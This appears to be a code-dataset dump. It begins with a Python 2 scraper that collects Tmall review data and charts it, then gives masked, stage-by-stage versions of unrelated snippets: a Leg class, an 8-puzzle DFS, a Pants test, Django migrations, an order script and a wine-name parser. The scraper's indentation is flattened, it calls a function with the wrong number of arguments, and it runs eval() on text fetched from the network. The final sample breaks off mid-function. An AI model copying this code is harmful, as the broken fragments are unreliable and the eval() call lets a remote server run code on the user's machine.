# http://rate.tmall.com/list_detail_rate.htm?itemId=41464129793&sellerId=1652490016¤tPage=1
import requests, re
from Tkinter import *
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import random
import matplotlib.pyplot as plt
plt.rcParams['font.sans-serif']=['SimHei'] #用来正常显示中文标签
plt.rcParams['axes.unicode_minus']=False #用来正常显示负号
def worker():
goods_url = L_entry.get()
pages = P_entry.get()
detail_list = []
detail_dict = {}
for i in range(int(pages)):
page = i + 1
goods_url = re.sub(r"currentPage=\d", "currentPage=%s" % page, goods_url)
rsp = requests.get(goods_url, headers=header)
data = rsp.text
data = eval(re.search(r"\{.*", data).group().strip(')').replace("false", "0").replace("true", "1"))
for detail in data['rateDetail']['rateList']:
#for detail in data['rateList']:
try:
size = detail["auctionSku"]
except Exception as e:
print e
continue
size = size.split(";")
s1 = size[0].split(":")[1] if size else ''
s2 = size[1].split(":")[1] if len(size)>1 else ''
s = str(s1) + str(s2)
if s in detail_list:
detail_dict[s] = detail_dict[s] + 1
else:
detail_list.append(s)
detail_dict[s] = 1
root.wm_title("page%d" % page)
root.wm_title("下载完成")
make_image(detail_list,detail_dict)
def make_image(detail_list,detail_dict,goods_name):
print detail_list
print detail_dict
colors = ['#ff0000', '#eb4310', '#f6941d', '#fbb417', '#ffff00', '#cdd541', '#99cc33', '#3f9337', '#219167',
'#239676', '#24998d', '#1f9baa', '#0080ff', '#3366cc', '#333399', '#003366', '#800080', '#a1488e',
'#c71585', '#bd2158']
people = [detail.decode('utf8') for detail in detail_list]
colors = colors[0:len(people)]
#y轴元素数量
y_pos = np.arange(len(people))
#每个元素对应的值,array
performance = [detail_dict[x] for x in detail_list]
bars = plt.barh(y_pos, performance, align='center')#这里是产生横向柱状图 barh h--horizontal
#设置颜色
for bar,colors in zip(bars,colors):
bar.set_color(colors)
#y轴每个元素标签
plt.yticks(y_pos, people)
plt.yticks(fontsize=7)
#x轴标题
plt.xlabel('count')
#x轴范围
plt.xlim(0,max(performance))
plt.title('size and colors count about taobao')
plt.show()
if __name__ == '__main__':
# goods_url = "https://rate.tmall.com/list_detail_rate.htm?itemId=527956695986&spuId=517713513&sellerId=2615125783&order=3¤tPage=1&append=0&content=1&tagId=&posi=&picture=&ua=146UW5TcyMNYQwiAiwZTXFIdUh1SHJOe0BuOG4%3D%7CUm5Ockt%2FRH1IdUB%2BRXpOdiA%3D%7CU2xMHDJ7G2AHYg8hAS8XLwEhD0ghSmQyZA%3D%3D%7CVGhXd1llXGhTal9iV2lSbVlhVmtJfUN4QHpAf0ZyT3JPekB0TGI0%7CVWldfS0SMg01ACAcIAAuE2JbZlInGiYcIAUrfSs%3D%7CVmhIGCcZOQQkGCccJAQ6ADwHJxskESwMOQQ5GSUaLxIyCDcCVAI%3D%7CV25Tbk5zU2xMcEl1VWtTaUlwJg%3D%3D&isg=Ar29SH8guO4XdhyBmwNtPy2rzB938vDSpl9fGH8C9JRDtt3oR6oBfItkFN0K&needFold=0&_ksTS=1496480841428_649&callback=jsonp650"
header = {
"authority": "rate.tmall.com",
"method": "GET",
"scheme": "https",
"accept": "*/*",
"accept-encoding": "gzip, deflate, sdch, br",
"accept-language": "zh-CN,zh;q=0.8",
"user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36",
}
root = Tk()
root.wm_title("淘宝牛统计")
L_label = Label(root, text="链接").grid(row=0, sticky=W)
L_entry = Entry(root,width = 240)
L_entry.grid(row=0, column=1, stick=E)
P_label = Label(root, text="页数").grid(row=1, sticky=W)
P_entry = Entry(root, width = 240)
P_entry.grid(row=1, column=1, stick=E)
start_btn = Button(root, text="开始",anchor = 'center', command=worker).grid(row=3)
width = 300
height = 100
screenwidth = root.winfo_screenwidth()
screenheight = root.winfo_screenheight()
size = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / 2, (screenheight - height) / 2)
print(size)
root.geometry(size)
root.mainloop()
| null | null | null | null | [
0
] |
672 | a4ecc578a163ee4657a2c9302f79f15c2e4e39de | class Leg:
<mask token>
<mask token>
@property
def smelly(self):
return self.__smelly
<mask token>
def is_smelly(self):
return self.__smelly
| class Leg:
<mask token>
<mask token>
@property
def smelly(self):
return self.__smelly
@smelly.setter
def smelly(self, smell):
self.__smelly = smell
def is_smelly(self):
return self.__smelly
| class Leg:
<mask token>
def bend_knee(self):
print('knee bent')
@property
def smelly(self):
return self.__smelly
@smelly.setter
def smelly(self, smell):
self.__smelly = smell
def is_smelly(self):
return self.__smelly
| class Leg:
__smelly = True
def bend_knee(self):
print('knee bent')
@property
def smelly(self):
return self.__smelly
@smelly.setter
def smelly(self, smell):
self.__smelly = smell
def is_smelly(self):
return self.__smelly
| class Leg():
__smelly = True
def bend_knee(self):
print("knee bent")
@property
def smelly(self):
return self.__smelly
@smelly.setter
def smelly(self,smell):
self.__smelly = smell
def is_smelly(self):
return self.__smelly | [
3,
4,
5,
6,
7
] |
673 | a85a7ad6ffb2b9aa5f5326d11c75ddbee680fac4 | <mask token>
def busca_dfs(nodo_inicial, custo_maximo_atual):
objetivo = '12345678_'
custo_maximo_absoluto = 100
explorados = set()
fronteira = deque()
fronteira.append(nodo_inicial)
if custo_maximo_atual > custo_maximo_absoluto:
return -1
while True:
if not fronteira:
explorados = None
return busca_dfs(nodo_inicial, custo_maximo_atual + 1)
v = fronteira.pop()
if v.estado == objetivo:
return busca_caminho(v, nodo_inicial)
if v not in explorados:
explorados.add(v)
estados_sucessores = sucessor.sucessor(v.estado)
if v.custo + 1 < custo_maximo_atual:
for e in estados_sucessores:
filho = expande.Nodo(e[1], v, e[0], v.custo + 1)
fronteira.append(filho)
def main():
estado_inicial = sys.argv[1]
custo_inicial = 0
pai = expande.Nodo(estado_inicial, 0, '', custo_inicial)
caminho = busca_dfs(pai, 1)
while caminho:
print(caminho.pop(), end=' ')
print()
<mask token>
| <mask token>
def busca_caminho(nodo_final, nodo_inicial):
pilha_acoes = deque()
v = nodo_final
while v != nodo_inicial:
pilha_acoes.append(v.acao)
v = v.pai
return pilha_acoes
def busca_dfs(nodo_inicial, custo_maximo_atual):
objetivo = '12345678_'
custo_maximo_absoluto = 100
explorados = set()
fronteira = deque()
fronteira.append(nodo_inicial)
if custo_maximo_atual > custo_maximo_absoluto:
return -1
while True:
if not fronteira:
explorados = None
return busca_dfs(nodo_inicial, custo_maximo_atual + 1)
v = fronteira.pop()
if v.estado == objetivo:
return busca_caminho(v, nodo_inicial)
if v not in explorados:
explorados.add(v)
estados_sucessores = sucessor.sucessor(v.estado)
if v.custo + 1 < custo_maximo_atual:
for e in estados_sucessores:
filho = expande.Nodo(e[1], v, e[0], v.custo + 1)
fronteira.append(filho)
def main():
estado_inicial = sys.argv[1]
custo_inicial = 0
pai = expande.Nodo(estado_inicial, 0, '', custo_inicial)
caminho = busca_dfs(pai, 1)
while caminho:
print(caminho.pop(), end=' ')
print()
<mask token>
| <mask token>
def busca_caminho(nodo_final, nodo_inicial):
pilha_acoes = deque()
v = nodo_final
while v != nodo_inicial:
pilha_acoes.append(v.acao)
v = v.pai
return pilha_acoes
def busca_dfs(nodo_inicial, custo_maximo_atual):
objetivo = '12345678_'
custo_maximo_absoluto = 100
explorados = set()
fronteira = deque()
fronteira.append(nodo_inicial)
if custo_maximo_atual > custo_maximo_absoluto:
return -1
while True:
if not fronteira:
explorados = None
return busca_dfs(nodo_inicial, custo_maximo_atual + 1)
v = fronteira.pop()
if v.estado == objetivo:
return busca_caminho(v, nodo_inicial)
if v not in explorados:
explorados.add(v)
estados_sucessores = sucessor.sucessor(v.estado)
if v.custo + 1 < custo_maximo_atual:
for e in estados_sucessores:
filho = expande.Nodo(e[1], v, e[0], v.custo + 1)
fronteira.append(filho)
def main():
estado_inicial = sys.argv[1]
custo_inicial = 0
pai = expande.Nodo(estado_inicial, 0, '', custo_inicial)
caminho = busca_dfs(pai, 1)
while caminho:
print(caminho.pop(), end=' ')
print()
if __name__ == '__main__':
main()
| import sys
import sucessor
import expande
from collections import deque
def busca_caminho(nodo_final, nodo_inicial):
pilha_acoes = deque()
v = nodo_final
while v != nodo_inicial:
pilha_acoes.append(v.acao)
v = v.pai
return pilha_acoes
def busca_dfs(nodo_inicial, custo_maximo_atual):
objetivo = '12345678_'
custo_maximo_absoluto = 100
explorados = set()
fronteira = deque()
fronteira.append(nodo_inicial)
if custo_maximo_atual > custo_maximo_absoluto:
return -1
while True:
if not fronteira:
explorados = None
return busca_dfs(nodo_inicial, custo_maximo_atual + 1)
v = fronteira.pop()
if v.estado == objetivo:
return busca_caminho(v, nodo_inicial)
if v not in explorados:
explorados.add(v)
estados_sucessores = sucessor.sucessor(v.estado)
if v.custo + 1 < custo_maximo_atual:
for e in estados_sucessores:
filho = expande.Nodo(e[1], v, e[0], v.custo + 1)
fronteira.append(filho)
def main():
estado_inicial = sys.argv[1]
custo_inicial = 0
pai = expande.Nodo(estado_inicial, 0, '', custo_inicial)
caminho = busca_dfs(pai, 1)
while caminho:
print(caminho.pop(), end=' ')
print()
if __name__ == '__main__':
main()
| import sys
import sucessor
import expande
from collections import deque
def busca_caminho(nodo_final, nodo_inicial):
pilha_acoes = deque() # iremos empilhar as acoes já que a estaremos com a ordem reversa a priori
v = nodo_final
while v != nodo_inicial:
pilha_acoes.append(v.acao)
v = v.pai
return pilha_acoes
def busca_dfs(nodo_inicial, custo_maximo_atual):
objetivo = "12345678_"
custo_maximo_absoluto = 100 #profundedade maxima tolerada
explorados = set()
fronteira = deque()
fronteira.append(nodo_inicial)
if custo_maximo_atual > custo_maximo_absoluto: #se a profundedade maxima atual é maior do que a profundedade maxima tolerada retorna -1 pois provavelmente não existe uma solução
return -1
while True:
if not fronteira: # Se a fronteira esta vazia
explorados = None
return busca_dfs(nodo_inicial, custo_maximo_atual + 1) #executa a função novamente mas dessa vez com uma profundedade maxima maior
v = fronteira.pop() #pop em vez de popleft para tratar a fronteira como pilha
if v.estado == objetivo:
return busca_caminho(v, nodo_inicial)
if v not in explorados:
explorados.add(v)
estados_sucessores = sucessor.sucessor(v.estado)
# Cada estado atingível a partir de v é acrescentado à fronteira caso a profundidade dos novos estados não exceda a profundidade máxima
if (v.custo + 1) < custo_maximo_atual:
for e in estados_sucessores:
filho = expande.Nodo(e[1], v, e[0], v.custo + 1)
fronteira.append(filho)
def main():
#como eu não queria ter que modificar as classes que já existiam, usei o custo de cada estado como um sinônimo de profundidade, já que os novos estados sempre tem custo = custo do pai + 1
estado_inicial = sys.argv[1]
custo_inicial = 0
pai = expande.Nodo(estado_inicial, 0, "", custo_inicial)
caminho = busca_dfs(pai, 1)
while caminho:
print(caminho.pop(), end = " ")
print()
if __name__ == '__main__':
main()
| [
2,
3,
4,
5,
6
] |
674 | 42d2d8717ec2c25a99302e8de3090d600f8e80ff | <mask token>
| <mask token>
def test_classify_source_files() ->None:
scalatest_files = {'foo/bar/BazSpec.scala'}
junit_files = {'foo/bar/BazTest.scala'}
lib_files = {'foo/bar/Baz.scala'}
assert {ScalatestTestsGeneratorTarget: scalatest_files,
ScalaJunitTestsGeneratorTarget: junit_files,
ScalaSourcesGeneratorTarget: lib_files} == classify_source_files(
junit_files | lib_files | scalatest_files)
| from pants.backend.scala.goals.tailor import classify_source_files
from pants.backend.scala.target_types import ScalaJunitTestsGeneratorTarget, ScalaSourcesGeneratorTarget, ScalatestTestsGeneratorTarget
def test_classify_source_files() ->None:
scalatest_files = {'foo/bar/BazSpec.scala'}
junit_files = {'foo/bar/BazTest.scala'}
lib_files = {'foo/bar/Baz.scala'}
assert {ScalatestTestsGeneratorTarget: scalatest_files,
ScalaJunitTestsGeneratorTarget: junit_files,
ScalaSourcesGeneratorTarget: lib_files} == classify_source_files(
junit_files | lib_files | scalatest_files)
| # Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from pants.backend.scala.goals.tailor import classify_source_files
from pants.backend.scala.target_types import (
ScalaJunitTestsGeneratorTarget,
ScalaSourcesGeneratorTarget,
ScalatestTestsGeneratorTarget,
)
def test_classify_source_files() -> None:
scalatest_files = {
"foo/bar/BazSpec.scala",
}
junit_files = {
"foo/bar/BazTest.scala",
}
lib_files = {"foo/bar/Baz.scala"}
assert {
ScalatestTestsGeneratorTarget: scalatest_files,
ScalaJunitTestsGeneratorTarget: junit_files,
ScalaSourcesGeneratorTarget: lib_files,
} == classify_source_files(junit_files | lib_files | scalatest_files)
| null | [
0,
1,
2,
3
] |
675 | b2fa6104f03dc76522a51f352101cef199ddc665 | <mask token>
| <mask token>
class Migration(migrations.Migration):
<mask token>
<mask token>
| <mask token>
class Migration(migrations.Migration):
dependencies = [('quizzapp', '0005_auto_20191115_2339')]
operations = [migrations.RemoveField(model_name='question', name='titre')]
| from django.db import migrations
class Migration(migrations.Migration):
dependencies = [('quizzapp', '0005_auto_20191115_2339')]
operations = [migrations.RemoveField(model_name='question', name='titre')]
| # Generated by Django 2.2.7 on 2019-11-15 23:43
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('quizzapp', '0005_auto_20191115_2339'),
]
operations = [
migrations.RemoveField(
model_name='question',
name='titre',
),
]
| [
0,
1,
2,
3,
4
] |
676 | 07bd3c7cacbf8d0e39d06b21456258ad92cb2294 | <mask token>
| def process_option(food, option):
food_name = list(food.keys())[option - 1]
food_price = food[food_name]
print(food_price)
print('You have chosen: ', option, food_name, '!', ' For unit price: ',
food_price)
q = int(input('How many? '))
total = q * food_price
print(food_name, 'x', q, '=', total)
client_name = input('Your name pls: ')
with open('data/' + client_name + '.txt', 'w') as file:
file.write(food_name + '|' + str(q) + '|' + str(food_price) + '|' +
str(total))
<mask token>
| def process_option(food, option):
food_name = list(food.keys())[option - 1]
food_price = food[food_name]
print(food_price)
print('You have chosen: ', option, food_name, '!', ' For unit price: ',
food_price)
q = int(input('How many? '))
total = q * food_price
print(food_name, 'x', q, '=', total)
client_name = input('Your name pls: ')
with open('data/' + client_name + '.txt', 'w') as file:
file.write(food_name + '|' + str(q) + '|' + str(food_price) + '|' +
str(total))
def confirmation():
c = input('Press y/n for confirmation: ')
if c == 'y':
print('Reservation confirmed!')
elif c == 'n':
print('Reservation decline!')
elif c == '':
print('Cancel reservation')
else:
print('CK next time...')
<mask token>
| def process_option(food, option):
food_name = list(food.keys())[option - 1]
food_price = food[food_name]
print(food_price)
print('You have chosen: ', option, food_name, '!', ' For unit price: ',
food_price)
q = int(input('How many? '))
total = q * food_price
print(food_name, 'x', q, '=', total)
client_name = input('Your name pls: ')
with open('data/' + client_name + '.txt', 'w') as file:
file.write(food_name + '|' + str(q) + '|' + str(food_price) + '|' +
str(total))
def confirmation():
c = input('Press y/n for confirmation: ')
if c == 'y':
print('Reservation confirmed!')
elif c == 'n':
print('Reservation decline!')
elif c == '':
print('Cancel reservation')
else:
print('CK next time...')
def show_order_info():
client_name = input('Your name in data: ')
file = open('data/' + client_name + '.txt', 'r')
data = file.read()
file.close()
print(data)
|
# module: order functionality
# HW2: complete this func
def process_option(food, option):
# print(food.keys())
food_name = list(food.keys())[option-1]
food_price = food[food_name]
print(food_price)
print("You have chosen: ", option, food_name, "!", " For unit price: ", food_price)
# HW2: ask quantity
# if ENTER = cancel
# if ent numb = calc total (func separate func)
# print total
# ask confirmation (y/n)
# ask for costumer name
# save the order data in data/<name>order.txt
q = int(input("How many? "))
total = q * food_price
print(food_name, "x", q, "=", total)
# file = open("copy.txt", "w")
# file.write("Your text goes here")
# file.close()
client_name = input("Your name pls: ")
# file = open("data/" + client_name + ".txt", "w")
# file.write(food_name + "|" + str(q) + str(food_price) + "|" + str(total))
# file.close()
with open("data/" + client_name + ".txt", "w") as file:
file.write(food_name + "|" + str(q) + "|" + str(food_price) + "|" + str(total))
def confirmation():
c = input("Press y/n for confirmation: ")
if c == "y":
print("Reservation confirmed!")
elif c == "n":
print("Reservation decline!")
elif c == "":
print("Cancel reservation")
else:
print("CK next time...")
def show_order_info():
client_name = input("Your name in data: ")
file = open("data/" + client_name + ".txt", "r")
data = file.read()
file.close()
print(data)
| [
0,
1,
2,
3,
4
] |
677 | 37f610457e51599a29168accd95eaa6699c6f777 | <mask token>
| <mask token>
class Migration(migrations.Migration):
<mask token>
<mask token>
| <mask token>
class Migration(migrations.Migration):
dependencies = [('accounts', '0011_auto_20201104_0936')]
operations = [migrations.AddField(model_name='users', name='isadmin',
field=models.IntegerField(default=0)), migrations.AlterField(
model_name='users', name='created_at', field=models.DateTimeField(
default='2020-11-05 16:33:16'))]
| from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('accounts', '0011_auto_20201104_0936')]
operations = [migrations.AddField(model_name='users', name='isadmin',
field=models.IntegerField(default=0)), migrations.AlterField(
model_name='users', name='created_at', field=models.DateTimeField(
default='2020-11-05 16:33:16'))]
| # Generated by Django 2.2 on 2020-11-05 16:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0011_auto_20201104_0936'),
]
operations = [
migrations.AddField(
model_name='users',
name='isadmin',
field=models.IntegerField(default=0),
),
migrations.AlterField(
model_name='users',
name='created_at',
field=models.DateTimeField(default='2020-11-05 16:33:16'),
),
]
| [
0,
1,
2,
3,
4
] |
678 | d786e89b9d478dcff3c541c89731247075d078c3 | <mask token>
def globalVariableCheck(debug=False):
for liquor in liquorLookup:
if liquor in noGrapeLookup:
print(
'WARNING:liquorLookup regexs will never execute - they are in noGrapeLookup:'
, liquor)
if liquor in ignoreGrapeLookup:
print(
'WARNING:liquorLookup regexs will never execute - they are in ignoreGrapeLookup:'
, liquor)
for winery in ignoreGrapeLookup:
if winery in noGrapeLookup:
print(
'WARNING:ignoreGrapeLookup regexs will never execute - they are in noGrapeLookup:'
, winery)
def setOptionDictMasterFldValues(optiondict, debug=False):
for fld in ('fldWine', 'fldWineDescr'):
if not optiondict[fld + 'Master']:
optiondict[fld + 'Master'] = optiondict[fld]
<mask token>
def findWinery(rec, lastWinery, lastReWinery, fldWine, debug=False):
if lastWinery:
if debug:
try:
print('fw:new winery:', rec[fldWine])
except Exception as e:
print('debug error8-continuing:', str(e))
print('rec[fldWine]:type:', type(rec[fldWine]))
print('fw:checking if this is lastWinery:', lastWinery)
if lastReWinery.search(rec[fldWine]):
if debug:
print('fw:this matches the last winery')
return lastWinery, lastReWinery
elif debug:
print('fw:not last winery')
for winery, reWinery in wineryLookup:
if debug:
print('fw:not lastWinery-checking winery:', winery)
if fldWine not in rec:
print('not a column in this record fldWine:', fldWine)
print('rec:', rec)
if reWinery.search(rec[fldWine]):
if debug:
print('fw:winery match found:', winery)
return winery, reWinery
return None, None
<mask token>
def findStrInRecReturnOther(rec, fldWineDescr, findStr, debug=False):
matchLoc = rec[fldWineDescr].find(findStr)
if matchLoc > -1:
other = rec[fldWineDescr][matchLoc + len(findStr) + 1:].split()
if debug:
print('fsirro:findStr matched:', findStr)
if debug:
print('fsirro:findStr other:', other)
return findStr, other
if debug:
print('fsirro:findStr did not match using:', findStr)
return None, []
<mask token>
def findVintage(rec, fldWine, debug=False):
for reVintage in vintageLookup:
m = reVintage.search(rec[fldWine])
if m:
if m.group(1):
vintage = m.group(1)
if debug:
print('fv:vintage-match:', reVintage, ':group1')
elif m.group(2):
vintage = m.group(2)
if debug:
print('fv:vintage-match:', reVintage, ':group2')
elif m.group(3):
vintage = m.group(3)
if debug:
print('fv:vintage-match:', reVintage, ':group3')
else:
vintage = m.group(4)
if debug:
print('fv:vintage-match:', reVintage, ':group4')
return vintage
return None
def buildWineryGrapeLookup(wines, fldWineDescr='winedescr', fldWine='wine',
debug=False):
wgLookup = {}
lastWinery = None
lastReWinery = None
for rec in wines:
if debug:
print('bwgl:new rec:', rec[fldWineDescr])
if not fldWineDescr in rec:
print('creating-field:', fldWineDescr)
rec[fldWineDescr] = ''
winery = grape = wine = liquor = None
other = []
lastWinery, lastReWinery = winery, reWinery = findWinery(rec,
lastWinery, lastReWinery, fldWine, debug=debug)
if not winery:
if debug:
print('bwgl:did not find winery-skipping:', rec[fldWine])
continue
if winery in ignoreGrapeLookup:
wine = ''
if debug:
print('bwgl:wine check ignoreGrapeLookup on winery:', winery)
elif winery in noGrapeLookup:
if debug:
print('bwgl:wine check noGrapeLookup on winery:', winery)
wine = wineLookupByName(noGrapeLookup[winery], rec[fldWineDescr
], [], 'noGrapeLookup', debug=debug)
if False and wine == '':
if debug:
print('bwgl:nograpelookup:no-match:set wine to None')
wine = None
elif winery in liquorLookup:
if debug:
print('bwgl:liquor check on winery:', winery)
liquor, reLiquor = findLiquor(rec, winery, fldWine, debug=debug)
if liquor is not None:
wine = liquor
if debug:
print('bwgl:liquor found and put in wine:', wine)
if wine is None:
if debug:
print('bwgl:grape check because wine is None')
grape, other = findGrapeByStr(rec, fldWineDescr)
if debug:
print('bwgl:grape:', grape, ':other:', other)
elif debug:
print('bwgl:grape check skipped - we have a wine')
if wine is None and grape is None:
if debug:
print('bwgl:record skipped - no grape or wine defined')
continue
if grape is None:
if debug:
print('bwgl:build other from winery')
wineryFind, other = findStrInRecReturnOther(rec, fldWineDescr,
winery, debug=debug)
if 'case' in other:
other.remove('case')
if debug:
print('bwgl:remove case from other')
if other:
if debug:
print('bwgl:looking at other for quals, bottlesize and vintage'
)
if not other[-1].isdigit():
for qual, reQual in reQualLookup:
if qual == other[-1]:
if debug:
print('bwgl:remove qualifier from other:', qual)
del other[-1]
break
if other and not other[-1].isdigit():
for size, reSize in sizeLookup:
if size == other[-1]:
if debug:
print('bwgl:remove bottlesize from other:', size)
del other[-1]
break
if other and other[-1].isdigit():
if winery in ignoreGrapeLookup and ignoreGrapeLookup[winery
] and other[-1] in ignoreGrapeLookup[winery]:
if debug:
print(
'bwgl:value is in ignoreLookupGrape - keeping it:',
other[-1])
else:
if debug:
print('bwgl:remove vintage from other:', other[-1])
del other[-1]
if wine and wine in other:
other.remove(wine)
if debug:
print('bwgl:remove wine from other:', wine)
if debug:
try:
print('bwgl:Final-Build:', winery, ':', grape, ':', wine,
':', liquor, ':', other, ':', rec[fldWineDescr], ':',
rec[fldWine])
except Exception as e:
print('debug error2-continuing:', str(e))
print('fldWine:', fldWine)
if grape is None and wine is not None:
grape = wine
if debug:
print('bwgl:set-grape-to-wine:', grape)
if debug:
print('bwgl:create wgLookup for winery:', winery, ':grape:', grape)
if winery not in wgLookup:
wgLookup[winery] = {grape: []}
elif grape not in wgLookup[winery]:
wgLookup[winery][grape] = []
if other and other not in wgLookup[winery][grape]:
wgLookup[winery][grape].append(other)
if debug:
print('bwgl:appending to wgLookup:other:', other)
if debug:
print('bwgl:complete-read-of-master-file:sort wgLookup')
for winery in wgLookup:
for grape in wgLookup[winery]:
wgLookup[winery][grape] = sorted(wgLookup[winery][grape], key=
len, reverse=True)
if debug:
print('\n' * 5)
print('START WGLOOKUP DUMPED')
print('#' * 80)
if ppFlag:
pp.pprint(wgLookup)
else:
print('bwgl:final-wgLookup:\n', wgLookup)
print('#' * 80)
return wgLookup
def findAddAttribWgLookup(rec, winery, value, fldWine, AbbrLookup=[],
defaultorderlist=None, valueDescr='', debug=False):
singlematch = []
if debug:
try:
print('faawl:value:', valueDescr, ':match-wgLookup:', rec[
fldWine], ':', wgLookup[winery][value])
except Exception as e:
print('debug error7-continuing:', str(e))
print('fldWine:', fldWine)
for valuematchset in wgLookup[winery][value]:
if debug:
print('faawl:testing valuematchset:', valuematchset, ':length:',
len(valuematchset))
allmatch = True
for valuematch in valuematchset:
reMatch1 = re.compile('\\b' + valuematch + '\\b', re.IGNORECASE)
reMatch2 = re.compile('\\s' + valuematch + '\\s', re.IGNORECASE)
m1 = reMatch1.search(rec[fldWine])
m2 = reMatch2.search(rec[fldWine])
if m1 or m2:
allmatch = True and allmatch
elif valuematch in AbbrLookup:
if debug:
print('faawl:valuematch-abbr:', valuematch, ':',
wineAbbrLookup[valuematch])
reMatch = re.compile(wineAbbrLookup[valuematch], re.IGNORECASE)
allmatch = reMatch.search(rec[fldWine]) and allmatch
else:
allmatch = False and allmatch
if debug:
print('faawl:valuematch:', valuematch, ':allmatch:', allmatch)
if allmatch:
if debug:
print('faawl:value matched:', valuematchset)
if len(valuematchset) == 1:
if debug:
print('faawl:single-valuematch-set-added-to-singlematch:',
valuematchset)
singlematch.append(valuematchset)
else:
if debug:
print('faawl:multivalue-valuematch-set-found:done')
return valuematchset
if not singlematch:
if debug:
print('faawl:exit with singlematch NOT populated return blank')
return []
if debug:
print('faawl:exit with singlematch populated:', singlematch)
if len(singlematch) == 1 or not defaultorderlist:
if debug:
print('faawl:return first entry in singlematch:', singlematch[0])
return singlematch[0]
defaultorder = defaultorderlist[:]
if debug:
print('faawl:multiple single match value-singlematch:', singlematch)
for val in singlematch[::-1]:
if val not in defaultorder:
defaultorder.insert(0, val)
if winery == 'Mondavi' and ['Tok'] in singlematch:
if debug:
print('faawl:Change from:', valuematchset, ':to Tok for mondavi')
return ['Tok']
for val in defaultorder:
if val in singlematch:
if debug:
print('faawl:selected-singlematch-value:', val)
return val
if debug:
print('faawl:valuematchset-empty')
return []
<mask token>
| <mask token>
def globalVariableCheck(debug=False):
for liquor in liquorLookup:
if liquor in noGrapeLookup:
print(
'WARNING:liquorLookup regexs will never execute - they are in noGrapeLookup:'
, liquor)
if liquor in ignoreGrapeLookup:
print(
'WARNING:liquorLookup regexs will never execute - they are in ignoreGrapeLookup:'
, liquor)
for winery in ignoreGrapeLookup:
if winery in noGrapeLookup:
print(
'WARNING:ignoreGrapeLookup regexs will never execute - they are in noGrapeLookup:'
, winery)
def setOptionDictMasterFldValues(optiondict, debug=False):
for fld in ('fldWine', 'fldWineDescr'):
if not optiondict[fld + 'Master']:
optiondict[fld + 'Master'] = optiondict[fld]
<mask token>
def findQualifier(wine, debug=False):
for val, reSearch in reQualLookup:
if reSearch.search(wine):
if debug:
print('findQualifier:matched-returning:', val)
return val
if debug:
print('findQualifier:no-match-returning:', None)
return None
def findWinery(rec, lastWinery, lastReWinery, fldWine, debug=False):
if lastWinery:
if debug:
try:
print('fw:new winery:', rec[fldWine])
except Exception as e:
print('debug error8-continuing:', str(e))
print('rec[fldWine]:type:', type(rec[fldWine]))
print('fw:checking if this is lastWinery:', lastWinery)
if lastReWinery.search(rec[fldWine]):
if debug:
print('fw:this matches the last winery')
return lastWinery, lastReWinery
elif debug:
print('fw:not last winery')
for winery, reWinery in wineryLookup:
if debug:
print('fw:not lastWinery-checking winery:', winery)
if fldWine not in rec:
print('not a column in this record fldWine:', fldWine)
print('rec:', rec)
if reWinery.search(rec[fldWine]):
if debug:
print('fw:winery match found:', winery)
return winery, reWinery
return None, None
def findLiquor(rec, winery, fldWine, debug=False):
for liquor, reLiquor in liquorLookup[winery]:
if debug:
print('fl:checking liquor:', liquor)
if reLiquor.search(rec[fldWine]):
if debug:
print('fl:liquor match found:', liquor)
return liquor, reLiquor
return None, None
def findGrapeByRegex(rec, fldWine, debug=False):
for grape, reGrape in grapeLookup:
if debug:
print('fgbr:grape:', grape)
if grape is not None and reGrape.search(rec[fldWine]):
if debug:
print('fgbr:grape match found:', grape)
return grape, reGrape
return None, None
def findStrInRecReturnOther(rec, fldWineDescr, findStr, debug=False):
matchLoc = rec[fldWineDescr].find(findStr)
if matchLoc > -1:
other = rec[fldWineDescr][matchLoc + len(findStr) + 1:].split()
if debug:
print('fsirro:findStr matched:', findStr)
if debug:
print('fsirro:findStr other:', other)
return findStr, other
if debug:
print('fsirro:findStr did not match using:', findStr)
return None, []
def findGrapeByStr(rec, fldWineDescr, debug=False):
for grape, reGrape in grapeLookup:
if debug:
print('fg:grape:', grape)
grape, other = findStrInRecReturnOther(rec, fldWineDescr, grape,
debug=debug)
if grape:
return grape, other
return None, []
def findVintage(rec, fldWine, debug=False):
for reVintage in vintageLookup:
m = reVintage.search(rec[fldWine])
if m:
if m.group(1):
vintage = m.group(1)
if debug:
print('fv:vintage-match:', reVintage, ':group1')
elif m.group(2):
vintage = m.group(2)
if debug:
print('fv:vintage-match:', reVintage, ':group2')
elif m.group(3):
vintage = m.group(3)
if debug:
print('fv:vintage-match:', reVintage, ':group3')
else:
vintage = m.group(4)
if debug:
print('fv:vintage-match:', reVintage, ':group4')
return vintage
return None
def buildWineryGrapeLookup(wines, fldWineDescr='winedescr', fldWine='wine',
debug=False):
wgLookup = {}
lastWinery = None
lastReWinery = None
for rec in wines:
if debug:
print('bwgl:new rec:', rec[fldWineDescr])
if not fldWineDescr in rec:
print('creating-field:', fldWineDescr)
rec[fldWineDescr] = ''
winery = grape = wine = liquor = None
other = []
lastWinery, lastReWinery = winery, reWinery = findWinery(rec,
lastWinery, lastReWinery, fldWine, debug=debug)
if not winery:
if debug:
print('bwgl:did not find winery-skipping:', rec[fldWine])
continue
if winery in ignoreGrapeLookup:
wine = ''
if debug:
print('bwgl:wine check ignoreGrapeLookup on winery:', winery)
elif winery in noGrapeLookup:
if debug:
print('bwgl:wine check noGrapeLookup on winery:', winery)
wine = wineLookupByName(noGrapeLookup[winery], rec[fldWineDescr
], [], 'noGrapeLookup', debug=debug)
if False and wine == '':
if debug:
print('bwgl:nograpelookup:no-match:set wine to None')
wine = None
elif winery in liquorLookup:
if debug:
print('bwgl:liquor check on winery:', winery)
liquor, reLiquor = findLiquor(rec, winery, fldWine, debug=debug)
if liquor is not None:
wine = liquor
if debug:
print('bwgl:liquor found and put in wine:', wine)
if wine is None:
if debug:
print('bwgl:grape check because wine is None')
grape, other = findGrapeByStr(rec, fldWineDescr)
if debug:
print('bwgl:grape:', grape, ':other:', other)
elif debug:
print('bwgl:grape check skipped - we have a wine')
if wine is None and grape is None:
if debug:
print('bwgl:record skipped - no grape or wine defined')
continue
if grape is None:
